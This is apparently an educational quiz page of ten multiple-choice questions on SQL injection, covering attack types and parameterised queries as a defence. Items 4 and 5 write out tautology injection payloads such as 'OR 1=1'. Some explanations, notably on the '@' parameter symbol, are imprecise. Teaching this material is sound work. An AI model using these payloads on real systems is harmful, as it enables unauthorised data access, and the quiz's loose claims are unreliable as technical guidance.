This set of SQL Multiple Choice Questions & Answers (MCQs) focuses on “SQL Injection”.
1. Which of the following is a technique in which a malicious code is inserted into strings that are passed to an SQL query?
a) SQL Malware
b) SQL Injection
c) SQL Hijack
d) SQL Trojan
View Answer
Explanation: SQL Injection is a technique in which a malicious code is inserted into strings that are passed to an SQL query which results in giving the access of the data in the database to the attacker.
2. Which of the following option is best to describe SQL Injection?
a) Web Hacking Technique
b) Database Hacking Technique
c) SQL Hacking Technique
d) Table Hacking Technique
View Answer
Explanation: SQL injection is one of the most common web hacking techniques. The attackers enters malicious code in the web page input field to get unauthorised access to the database.
3. Which of the following is a time-based SQL injection technique?
a) In-Band Injection
b) Error Based Injection
c) Union Based Injection
d) Time Based Blind Injection
View Answer
Explanation: Blind Injection technique relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results. Error-based is an in-band SQL Injection technique that relies on error messages thrown by the database. Union-based is an in-band SQL injection technique that uses the UNION SQL operator to combine the results of two or more SELECT statements into a single result.
4. Consider the following statements and tell which of them can be used for SQL injection?
a) SELECT * FROM table_name WHERE column_name = 105 NOT (1=1);
b) SELECT * FROM table_name WHERE column_name = 105 AND 1=1;
c) SELECT * FROM table_name WHERE column_name = 1=1;
d) SELECT * FROM table_name WHERE column_name = 16 OR 1=1;
View Answer
Explanation: The statement that can be used for SQL injection is –
SELECT * FROM TABLE_NAME WHERE column_name = 16 OR 1=1;
The above statement is valid and will return all rows from the table, since OR 1=1 is always true.
5. Consider the following statements and tell which of them can be used for SQL injection?
a) SELECT * FROM Students WHERE Id =”” and “”=”” AND Password =”” and “”=””;
b) SELECT * FROM Students WHERE Id =”” or “”=”” AND Password =”” or “”=””;
c) SELECT * FROM Students WHERE Id =”” not “”=”” AND Password =”” not “”=””;
d) SELECT * FROM Students WHERE Id =”” or “”=”” AND Password =””;
View Answer
Explanation: The statement that can be used for SQL injection is –
SELECT * FROM Students WHERE Id ="" OR ""="" AND Password ="" OR ""="";
The above statement is valid and will return all rows from the Students table, since OR “”=”” is always TRUE.
6. In SQL, the parameters that can be used for protection from SQL injection is preceded by which symbol?
a) @
b) &
c) %
d) *
View Answer
Explanation: In SQL, the parameters that can be used for protection from SQL injection is preceded by the @ symbol. These parameters are values that are added to an SQL query at execution time and the SQL engine checks each parameter to ensure that it is correct for its column and are treated as not a part of statement to be executed.
7. Java servlets are vulnerable to SQL injection.
a) True
b) False
View Answer
Explanation: Java servlets are also vulnerable to SQL injection if input validation is not enforced and if they build SQL queries dynamically.
8. Which of the following field is susceptible to SQL injection?
a) Checklist
b) Radio Buttons
c) Input field
d) Lists
View Answer
Explanation: Any input field like Username, Password, Card Number etc. which extracts data from database by using where clause are susceptible to SQL injection.
9. Which of the following statement demonstrate the correct way to use the protection parameters in SQL?
a) SELECT * FROM Students WHERE Id = &0;
b) SELECT * FROM Students WHERE Id = *0;
c) SELECT * FROM Students WHERE Id = @0;
d) SELECT * FROM Students WHERE Id = %0;
View Answer
Explanation: The statement that demonstrate the correct way to use the protection parameters in SQL is –
SELECT * FROM Students WHERE Id = @0";
Here, the @ symbol is the protection parameter that precedes 0 and is not counted as a part of the executable SQL statement.
10. SQL injection attacks can be classified into how many categories?
a) 5
b) 4
c) 2
d) 3
View Answer
Explanation: Broadly, the SQL injection attacks can be classified into –
In-band SQL Injection – It occurs when the attacker is able to gather information and launch an attack via the same channel.
Inferential SQL Injection – It is a technique in which no data is actually transferred via the web application. So, the attacker will not be able to see the result of an attack.
Out-of-band SQL Injection – They usually involve sending the data directly from the database server to a machine that is controlled by the attacker.
Sanfoundry Global Education & Learning Series – SQL.
To practice all areas of SQL, here is complete set of 1000+ Multiple Choice Questions and Answers.